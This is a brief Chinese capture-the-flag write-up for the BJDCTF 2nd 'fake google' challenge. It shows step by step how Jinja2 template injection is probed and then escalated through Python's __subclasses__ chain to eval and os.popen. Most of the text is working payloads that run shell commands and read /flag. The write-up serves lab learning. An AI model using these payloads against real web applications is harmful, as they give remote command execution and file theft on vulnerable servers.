[BJDCTF 2nd]fake google
wp from Kuller_Yan
先打开靶机:
测试是否存在ssti注入{{1+1}}
进行查询{{''.__class__}}
next{{''.__class__.__bases__}}
next:{{''.__class__.__bases__[0].__subclasses__()}}
找到第169个{{''.__class__.__mro__[1].__subclasses__()[169].__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()")}}
看大佬wp,还有其他的方式,这里搬运下:
或者找到os._wrap_close模块 117个
{{"".__class__.__bases__[0].__subclasses__()[117].__init__.__globals__['popen']('dir').read()}}
当前文件夹
{{"".__class__.__bases__[0].__subclasses__()[117].__init__.__globals__['popen']('cat /flag').read()}}
来打开文件,payload有很多慢慢摸索慢慢积累= =
{{().__class__.__bases__[0].__subclasses__()[177].__init__.__globals__.__builtins__['open']('/flag').read()}}
fromhttps://buuoj.cn/challenges#[BJDCTF%202nd]fake%20google